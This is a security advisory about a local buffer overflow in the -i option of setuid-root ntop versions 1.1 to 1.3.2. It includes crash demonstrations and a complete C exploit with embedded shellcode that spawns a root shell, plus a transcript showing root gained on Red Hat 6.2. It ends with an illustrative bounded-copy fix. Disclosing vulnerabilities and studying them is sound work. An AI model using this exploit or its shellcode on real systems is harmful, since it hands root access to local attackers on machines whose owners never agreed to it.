COMMAND

    ntop

SYSTEMS AFFECTED

    ntop 1.1, ntop 1.2.a7, ntop 1.3.1, ntop 1.3.2

PROBLEM

    Christophe Bailleux found the following.  All ntop versions listed
    above  are vulnerable  to a  local buffer  overflow in  the handling
    of the  -i option:  the interface  name given on the  command line is
    copied into a fixed-size buffer  without a length check.  Ntop must
    be owned by root with the setuid bit set for the  attacker to gain
    root privileges.

    a) ntop 1.1

        tshaw:/home/cb/ntop-1.1/$ ./ntop -i `perl -e 'print "A"x208'`
        ntop v.1.1 MT [i686-pc-linux-gnu] listening on AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

        Host      Act   -Rcvd-      Sent       TCP     UDP  ICMP
        Segmentation fault
        tshaw:/home/cb/SRCAUDIT/ntop-1.1$

    b) ntop 1.2a7

        tshaw:/home/cb/ntop-1.2a7$ ./ntop -i `perl -e 'print "A"x109'`
        Segmentation fault
        tshaw:/home/cb/SRCAUDIT/ntop-1.2a7$

    c) ntop 1.3.1

        tshaw:/home/cb/ntop-1.3.1$ ./ntop -i `perl -e 'print "A"x271'`
        Segmentation fault
        tshaw:/home/cb/SRCAUDIT/ntop-1.3.1$

    d) ntop 1.3.2

        tshaw:/home/cb/ntop-1.3.2$ ./ntop -i `perl -e 'print "A"x2835'`

        24/Oct/2000:12:32:16 ntop v.1.3.2 MT [i686-pc-linux-gnu] (08/11/00 07:04:32 PM build)
        24/Oct/2000:12:32:16 Listening on
        [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
        24/Oct/2000:12:32:16 Copyright 1998-2000 by Luca Deri <deri@ntop.org>
        24/Oct/2000:12:32:16 Get the freshest ntop from http://www.ntop.org/
        24/Oct/2000:12:32:16 Initialising...
        Segmentation fault
        tshaw:/home/cb/ntop-1.3.2$

    The exploit was tested on Red Hat Linux 6.2 (Zoot), where ntop 1.1
    is installed by default with the setuid root bit set:

        [cb@nux cb]$ cat /etc/redhat-release
        Red Hat Linux release 6.2 (Zoot)
        [cb@nux cb]$ rpm -qf /sbin/ntop
        ntop-1.1-1
        [cb@nux cb]$ id
        uid=535(cb) gid=535(cb) groups=535(cb)
        [cb@nux cb]$ ./expl

        ntop v.1.1 MT [i586-pc-linux-gnu] listening on
        ..............................

        Host        Act   -Rcvd-      Sent    TCP   UDP ICMP
        bash#
        bash# id
        uid=0(root) gid=535(cb) egid=3(sys) groups=535(cb)
        bash# exit
        [cb@nux cb]$

    Exploit:

    #include <stdlib.h>
    #include <string.h>
    #include <stdio.h>
    #include <unistd.h>   /* execl() */

    /* Size of the overflowing argument for ntop 1.1 (see a) above). */
    #define LEN 208

    int main (int argc, char **argv)
    {
      char buf[LEN + 12];
      int  ret = 0xbffffba0;    /* guessed return address, adjustable via argv[1] */
      int  *p;

      char code[]=
          "\x31\xdb\xb8\xb7\xaa\xaa\xaa\x25\xb7\x55\x55\x55\x53\x53\xcd\x80"
          "\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80"
          "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
          "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
          "\x80\xe8\xdc\xff\xff\xff/bin/sh";

      /* Optional offset added to the return address guess. */
      if (argc > 1) {
        ret += atoi(argv[1]);
        fprintf(stderr, "Using ret %#010x\n", ret);
      }

      /* NOP sled, with the code placed at the end of the LEN-byte region. */
      memset(buf, '\x90', LEN);
      memcpy(buf + LEN - strlen(code), code, strlen(code));

      /* Return address written twice, then a NUL to terminate the argument. */
      p = (int *) (buf + LEN);

      *p++ = ret;
      *p++ = ret;
      *p   = 0;

      execl("./ntop", "ntop", "-i", buf, NULL);

      /* Only reached if execl() fails. */
      perror("execl");
      return 1;
    }

SOLUTION

    Upgrade to the latest version.
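    The defect class behind this advisory, as an added illustration that is
    not ntop's code:  an interface name  from  -i  copied  into  a  fixed
    buffer  with  no length  check,  beside  a  bounded  copy  that  rejects
    over-long  names.   IFNAME_MAX,  set_device_*  and  parse_interface  are
    assumed names for the illustration.

```c
/* Added illustration (not ntop's code): unchecked vs. bounded copy of the
 * "-i" argument into a fixed-size buffer. IFNAME_MAX is an assumed size. */
#include <stdio.h>
#include <string.h>

#define IFNAME_MAX 16   /* assumed buffer size, comparable to Linux IFNAMSIZ */

/* Unsafe pattern: no length check, so an argument longer than the caller's
 * buffer writes past its end. Shown for comparison only; never called here. */
void set_device_unchecked(char *dev, const char *arg)
{
    strcpy(dev, arg);
}

/* Hardened: refuse any name that would not fit together with its NUL.
 * Returns 0 on success, -1 when the argument is rejected. */
int set_device_checked(char *dev, size_t devlen, const char *arg)
{
    size_t n = strlen(arg);
    if (n == 0 || n >= devlen)
        return -1;
    memcpy(dev, arg, n + 1);
    return 0;
}

/* Scan argv for "-i <name>" and store the name in dev. Returns 0 on
 * success, -1 if the option is missing or the name is too long. */
int parse_interface(int argc, char **argv, char *dev, size_t devlen)
{
    for (int i = 1; i + 1 < argc; i++) {
        if (strcmp(argv[i], "-i") == 0)
            return set_device_checked(dev, devlen, argv[i + 1]);
    }
    return -1;
}

int main(int argc, char **argv)
{
    char dev[IFNAME_MAX];
    if (parse_interface(argc, argv, dev, sizeof dev) != 0) {
        fprintf(stderr, "usage: %s -i <interface>\n", argv[0]);
        return 1;
    }
    printf("listening on %s\n", dev);
    return 0;
}
```

    Run with the 208-byte argument from a) above and the bounded version
    rejects it instead of crashing.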